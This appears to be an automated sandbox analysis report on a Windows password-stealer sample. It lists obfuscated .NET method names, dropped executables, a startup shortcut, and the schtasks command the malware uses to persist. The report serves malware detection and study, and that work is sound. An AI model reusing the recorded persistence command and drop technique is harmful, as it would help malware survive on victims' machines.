Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, PT5L9M0MhqK8Q0f7MB.cs	High entropy of concatenated method names: 'B0SKi9RZAa', 'alYKNVsR4I', 'k6tKYAZiXt', 'WyEKjouC94', 'p0dK8xMR1K', 'xHPKxNP1Vg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, xZ6IqqbPfae5139K1hU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LCoD8uLU3x', 'M3PDt3SWOp', 'sEFDvqlpbx', 'cWxDQkJDKy', 'aaVDVfODUy', 'EJnDXHFVk8', 'GrYDqwbkrk'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, VXgNQTiuS7Mq9yDKkD.cs	High entropy of concatenated method names: 'VIl6J7ofwG', 'EKZ65uyQIS', 'S9M6yIycuy', 'dte61lTb4u', 'C996oyvDog', 'k8jyVMvgw2', 'zByyXhWeBH', 'CpVyqFV9G3', 'Hwny2GwGDL', 'kq1y0OpTMX'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, zV7Ah65u26UDaxa1D3.cs	High entropy of concatenated method names: 'Dispose', 'sZEb08TIDQ', 'fYXnNaZava', 'gtHwwSs2oe', 'egrbgBo17g', 'GAkbz8gnYb', 'ProcessDialogKey', 'gyrn4T5L9M', 'ChqnbK8Q0f', 'nMBnnIBRAa'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, Nv3sLXzlWLSj3jB4F1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0em7AeEpF', 'uXNmLZqKNN', 'JnLmcJvsgi', 'uprmHglUZF', 'vgQmKXd0hK', 'FEXmmalpvG', 'NZlmDerdZd'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, edf7UgrQnKs2ebtqMV.cs	High entropy of concatenated method names: 'BDm7uAuotw', 'vG27RY96eC', 'iW47iBP8JB', 'Lwt7NFCxOA', 'uKN7jqTyEJ', 'Xa07x7hUPt', 'yF47dUmTPc', 'cGG7SrSnk6', 'Vsb7UKZ7CN', 'vdF7enRR2s'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	File created: C:\Users\user\AppData\Roaming\pNYyTm.exe			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
